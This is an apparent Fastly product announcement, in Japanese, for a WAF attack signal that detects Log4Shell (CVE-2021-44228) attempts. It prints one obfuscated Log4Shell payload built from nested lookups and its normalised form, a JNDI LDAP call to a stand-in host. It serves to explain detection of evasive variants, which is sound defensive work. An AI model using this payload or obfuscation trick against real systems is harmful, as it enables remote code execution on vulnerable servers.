お知らせ : LOG4J-JNDI 攻撃シグナルが利用可能になりました
背景
2021年12月、CVE-2021-44228 (通称 Log4Shell) が業界を騒がせました。Log4j ライブラリは広く使用されているため、さまざまなソフトウェアが脅威にさらされました。さらに悪いことに、ログとやり取りするアプリケーションがこの攻撃の影響を受けたため、ペイロードの1つがログ用パイプラインを通過する場合、攻撃者が直接アクセスできないサービスでさえ危機にさらされる事態となりました。
Fastly のカスタマー・セキュリティ・オペレーション・センター (CSOC) とセキュリティリサーチチームは、すべてのお客様に仮想パッチを迅速にデプロイすることに協力して取り組みました。Fastly は社内イ ンシデントレスポンスチームを立ち上げ、お客様がこの重大な脅威の影響を受けないよう24時間体制でモニタリングを実施しました。その数日後、さまざまな Log4Shell 攻撃に関するデータとインサイトを公開しました。モニタリング中は、一般的な WAF パターンによる検出を回避しようとする攻撃者によって開発された回避技術によってペイロードのバリアントが変異することを確認しました。
SmartParse の拡張
Fastly の攻撃シグナ ルと異常シグナルはすべて SmartParse 技術を活用していますが、素早いレスポンスが必要なケースでは、正規表現に基づく仮想パッチを実装することもあります。この場合、お客様にパッチを数分以内に適用することができます。ただし、今回は作成されるバリアントの数が非常に多かったため、Fastly では、SmartParse の能力を活用してこれらの攻撃を検出する方がより効率的であると考えました。
Fastly のエンジニアは舞台裏で対策作業に取り組み、SmartParse を拡張し、複雑な Log4Shell のペイロードを取得して最も基本的な形式にまで落とし込むことを可能にするメソッドを開発しました。ここでは、例を示すために、実際に使用された複雑なペイロードの1つを挙げます。
${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-}/site.local/test}
SmartParse を使用すると、これを次のような最も基本的な形式に変換できます。
${jndi:ldap://site.local/test}
高度な Log4Shell 攻撃の検出と保護
SmartParse を活用すると、誤検出を最小限またはゼロに抑えながら、絶えず増え続ける正規表現パターンを管理したり、それらに依存したりする必要なしに、高度で正確な検出が可能になります。
Fastly は、この機能を利用して Log4Shell 攻撃を阻止する新しい攻撃シグナル (LOG4J-JNDI) を、まず Fastly セキュリティラボのプログラム内で適用しました。この攻撃シグナルを数か月間にわたって観察した後、すべてのお客様を対象に一般公開版を公式にリリースしました。これにより、正規表現に基づくマッチングよりも検出が改善されるとともに、その他 の攻撃シグナルと組み合わせて、組織または企業レベルでルールを構築および作成し、組織全体にわたってグローバルにレスポンスポリシーを迅速に導入することも可能になります。
次のステップ
Fastly 次世代 WAF のお客様は、コンソールにログインすると、リクエストフィード内に新しい LOG4J-JNDI 攻撃シグナルが追加されていることをすぐにご確認いただけます。この攻撃シグナルは、デフォルトではしきい値ベースのブロックを使用するよう有効化されており、お客様ご自身で必要に応じて適切なレベルに調整することも、インスタントブロックを実装することもできます。
WAF を導入していないお客様や、Log4Shell 攻撃または OWASP インジェクション攻撃を検出するのに正規表現のパターンマッチングを利用する従来型の WAF を使用しているお客様には、Fastly 次世代 WAF (Powered by Signal Sciences) のデモを行い、従来型の WAF に伴う煩雑な管理や誤検出の心配がない最先端のソリューションをご紹介いたします。詳細については、Fastly のセキュリティエキスパートまでお問い合わせください。